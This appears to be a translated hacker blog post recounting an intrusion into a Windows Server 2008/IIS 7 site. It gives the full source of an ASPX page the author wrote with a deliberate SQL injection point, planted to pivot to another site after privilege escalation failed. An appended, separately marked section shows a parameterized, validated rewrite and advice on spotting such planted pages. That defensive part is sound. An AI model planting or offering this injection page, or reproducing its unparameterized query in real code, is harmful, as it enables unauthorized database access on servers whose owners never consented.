Yesterday I looked at a site together with 4z1. Privilege escalation was really hard; we spent a full 5 hours on it and got nowhere. Server 2008 + IIS 7, no sa, no root, no services of any kind.
Along the way we needed an ASPX page with a crafted injection point in order to pivot to another site. I found a pile of code online and not one piece of it worked.
It isn't much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影 dedicated ASPX crafted-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
    // Runs on every request to this page.
    void Page_Init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        // "连接名" stands for the name of a connection string defined in web.config.
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the parameter, i.e. ?xxser=1

        // "[表]" and "列名" stand for the table and column names. The parameter is
        // concatenated into the query unquoted and unvalidated: this is the deliberate
        // injection point the post describes.
        System.Data.SqlClient.SqlCommand command =
            new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        int x = command.ExecuteNonQuery(); // for a SELECT this returns -1, not a row count
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
</div>
</form>
</body>
</html>
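For contrast, here is the hardened counterpart of that handler. This is an added example and not code from the post; it assumes the same connection-string name "连接名", the same placeholder table "[表]", and that the placeholder column "列名" is an integer column, exactly as the snippet above uses them. The three changes are the ones that remove the injection point: the input is validated as an integer before any SQL is built, the value is passed as a typed parameter instead of being concatenated into the query text, and a SELECT is executed with ExecuteReader (ExecuteNonQuery returns -1 for a SELECT, which is why the original page prints -1).

```csharp
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Added example (not the post's code). Assumes the same placeholders as the
    // original page: connection-string name "连接名", table "[表]", integer column "列名".
    void Page_Init(object sender, EventArgs e)
    {
        // 1. Validate: the column is numeric, so the parameter must parse as an int.
        //    Quotes, keywords and comment sequences are rejected before any SQL exists.
        int id;
        if (!int.TryParse(Request.Params["xxser"], out id))
        {
            Response.StatusCode = 400;
            Response.Write("bad parameter");
            Response.End();
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

        // 2. Parameterize: the value travels as a typed SqlParameter, never as query
        //    text, so the input cannot change the structure of the statement.
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand("select * from [表] where 列名 = @id", conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();

            // 3. Use ExecuteReader for a SELECT and count the rows actually returned.
            int rows = 0;
            using (SqlDataReader rdr = cmd.ExecuteReader())
            {
                while (rdr.Read())
                {
                    rows++;
                }
            }

            // 4. Only the validated integer is echoed back, never the raw request string,
            //    so the page is not a reflected-XSS sink either.
            Response.Write("id=" + id + " rows=" + rows);
        }
    }
</script>
```

From the defender's side, the shape of the original page is itself the thing to look for: a request parameter read straight from Request.Params, concatenated into a SqlCommand string and echoed back. Source scanning or code review should flag that pattern wherever it appears, and an unexpected .aspx file of this kind appearing under an IIS web root is exactly what file-integrity monitoring on the web content directory is meant to surface.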